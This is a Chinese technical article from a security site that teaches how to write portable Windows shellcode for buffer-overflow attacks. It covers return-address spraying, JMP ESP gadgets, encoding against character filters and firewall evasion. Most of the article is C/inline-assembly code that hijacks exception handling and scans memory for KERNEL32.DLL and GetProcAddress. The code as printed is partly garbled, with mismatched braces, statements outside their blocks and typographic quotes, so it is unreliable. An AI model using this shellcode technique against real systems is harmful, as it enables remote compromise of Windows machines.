Windows的SHELLCODE编写高级技巧

安全 网站安全
unix等系统因为有用户概念,所以往往溢出是使用先得到普通帐号,然后登陆后用溢出再加载一个SHELL的办法得到ROOT权限,其系统调用又方便,所以SHELLCODE编写一般都比较简单。

unix等系统因为有用户概念,所以往往溢出是使用先得到普通帐号,然后登陆后用溢出再加载一个SHELL的办法得到ROOT权限,其系统调用又方便,所以SHELLCODE编写一般都比较简单。但WINDOWS系统往往不提供登陆服务,所以溢出攻击的SHELLCODE往往要提供SOCKET连接,要加载程序得到SHELL等,而WINDOWS的系统调用int2e接口又不如unix系统调用int80规范,所以一般都使用API,而API函数地址又因为系统版本的不同而不一样,所以要编写WINDOWS下面比较实用、通用点的SHELLCODE比较麻烦。经过一段时间的思考,得到了WINDOWS下编写SHELLCODE的比教好的办法。

1、溢出点确定。使用溢出点附近覆盖一片一个RET指令地址的办法,这样只要知道溢出点大致范围就可以了。

2、SHELLCODE定位。使用ESP寄存器定位,只要前面那覆盖的RET地址后面放一个JMPESP功能的指令地址就可以定位了。

3、RET指令地址、JMP ESP功能指令地址采用代码页里面的地址,54 C3,或者FF E4、C3这个一个语言的WINDOWS地址固定,也很好找这个地址。

4、SHELLCODE直接使用C语言编写,方便编写、修改、调试。

5、SHELLCODE统一编码,满足应用条件对SHELLCODE字符的限制,用一段小汇编代码解码,这样编写SHELLCODE就可以不用考虑特殊字符了。

6、通信加密,对付防火墙,实现FTP功能,实现内存直接接管WEB服务等的高级应用。下面主要介绍介绍编写通用SHELLCODE的办法。主要SHELLCODE里面使用的API自己用GetProcAddress定位,要使用库用LoadLibraryA加载。那这样SHELLCODE就只依靠这两个API了。那这两个API的地址又怎么解决呢,LoadLibraryA这个API在系统库KERNEL32.DLL里面,也可以使用GetProcAddress得到。那关键就是要找到系统库kernel32.dll和GetProcAddress的地址了。因为一般应用程序都会加载kernel32.dll,所以解决办法就是在内存里面找到这个系统库和API地址,所幸知道了WINDOWS的模块数据结构也就不难了,主要是增加异常结构处理 。下面是VC6.0程序代码:

void shellcodefn()

{

int *except[3];

FARPROC procgetadd=0;

char *stradd;

int imgbase,fnbase,i,k,l;

HANDLE libhandle;

_asm {

jmp nextcall

getstradd: pop stradd

lea EDI,except

mov eax,dword ptr FS:[0]

mov dword ptr [edi+0x08],eax

mov dword ptr FS:[0],EDI

}

except[0]=0xffffffff;

except[1]=stradd-0x07;

/* 保存异常结构链和修改异常结构链,SHELLCODE接管异常 */

imgbase=0x77e00000;

/* 搜索KERNEL32.DLL 的起始其实地址 */

call getexceptretadd

}

/* 得到异常后的返回地址 */

for(;imgbase<0xbffa0000,procgetadd==0;){

imgbase+=0x10000;

/* 模块地址是64K为单位,加快速度*/

if(imgbase==0x78000000) imgbase=0xbff00000;

/* 如果到这还没有搜索到,那可能是WIN9X系统 */

if(*( WORD *)imgbase==’ZM’&& *(WORD *)

(imgbase+*(int *)(imgbase+0x3c))==’EP’){

/* 模块结构的模块头 */

fnbase=*(int *)(imgbase+*(int *)(imgbase+0x3c)+0x78)+imgbase;

k=*(int *)(fnbase+0xc)+imgbase;

if(*(int *)k ==’NREK’&&*(int *)(k+4)==’23LE’){

/* 模块名 */

libhandle=imgbase;

/* 得到模块头地址,就是模块句柄 */

k=imgbase+*(int *)(fnbase+0x20);

for(l=0;l<*(int *) (fnbase+0x18);++l,k+=4){

if(*(int *)(imgbase+*(int *)k)==’PteG’&&*(int *)(4+imgbase+*(int *)k)==’Acor’){

/* 引出名 */

k=*(WORD *)(l+l+imgbase+*(int *)(fnbase+0x24));

k+=*(int *)(fnbase+0x10)-1;

k=*(int *)(k+k+k+k+imgbase+*(int *)(fnbase+0x1c));

procgetadd=k+imgbase;

/* API地址 */

break;

}

}

}

}

}

// 搜索KERNEL32。DLL模块地址和API函数 GetProcAddress地址

// 注意这儿处理了搜索页面不在情况。

_asm{

lea edi,except

mov eax,dword ptr [edi+0x08]

mov dword ptr fs:[0],eax

}

/* 恢复异常结构链 */

if(procgetadd==0) goto die ;

/* 如果没找到GetProcAddress地址死循环 */

die: goto die ;

_asm{

getexceptretadd: pop eax

push eax

mov edi,dword ptr [stradd]

mov dword ptr [edi-0x0e],eax

ret

/* 得到异常后的返回地址,并填写到异常处理模块 */

/* 异常处理模块 */

errprogram: mov eax,dword ptr [esp+0x0c]

add eax,0xb8

mov dword ptr [eax],0x11223344 //stradd-0xe

/* 修改异常返回EIP指针 */

xor eax,eax //2

/* 不提示异常 */

ret //1

/* 异常处理返回 */

execptprogram: jmp errprogram //2 bytes stradd-7

nextcall: call getstradd //5 bytes

}

}

责任编辑:蓝雨泪 来源: 红黑联盟
相关推荐

2013-12-10 10:53:47

shellcode

2022-05-06 18:55:29

Java技巧Shellcode

2014-07-29 13:55:10

程序员代码

2014-11-10 09:59:08

jQuery

2020-07-15 14:51:39

代码C+开发

2022-01-19 17:48:57

测试用例开发

2023-03-27 15:05:10

Python技巧

2010-09-13 10:11:06

CSSDWMX

2017-09-14 12:45:35

2014-07-28 10:27:37

linux集群

2016-01-14 11:50:16

Shellcode分析PyAnaShellcode分析

2010-01-27 16:35:54

Android常用技巧

2010-02-22 11:14:43

Python编写

2011-08-01 11:56:45

Google搜索

2015-03-03 14:10:53

shellcode哈夫曼编码Huffy

2017-09-05 08:16:29

代码判断函数

2021-02-23 10:48:30

Python代码开发

2019-10-08 15:27:18

扫雷BashLinux

2020-04-08 10:21:58

bash脚本语言

2020-04-14 09:22:47

bash脚本技巧
点赞
收藏

51CTO技术栈公众号